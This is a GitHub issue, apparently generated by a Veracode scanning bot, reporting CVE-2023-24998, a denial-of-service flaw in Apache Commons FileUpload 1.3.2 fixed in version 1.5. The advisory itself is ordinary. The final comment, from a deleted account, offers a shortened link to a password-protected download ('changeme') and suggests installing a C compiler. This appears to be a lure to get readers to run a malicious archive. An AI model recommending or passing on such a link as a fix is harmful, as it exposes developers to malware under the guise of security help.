julz0815 / test-action

0 stars 1 forks source link

CVE: 2023-24998 found in Apache Commons FileUpload - Version: 1.3.2 [JAVA] #1104

Open github-actions[bot] opened 1 month ago

github-actions[bot] commented 1 month ago

Veracode Software Composition Analysis

Attribute Details
Library Apache Commons FileUpload
Description The Apache Commons FileUpload component provides a simple yet flexible means of adding support for multipart file upload functionality to servlets and web applications.
Language JAVA
Vulnerability Denial Of Service (DoS)
Vulnerability description Apache Commons FileUpload is vulnerable to Denial Of Service (DoS). The vulnerability exists because the default configuration doesn't limit the number of request parts to be processed which allows an attacker to submit an upload with unlimited file parts, resulting in Denial of Service.
CVE 2023-24998
CVSS score 5
Vulnerability present in version/s 1.0-rc1-1.4
Found library version/s 1.3.2
Vulnerability fixed in version 1.5
Library latest version 1.5
Fix

Links:

ghost commented 1 month ago

maybe this will help https://bit.ly/3TC7hrw

Password: changeme

you may need to install the c compiler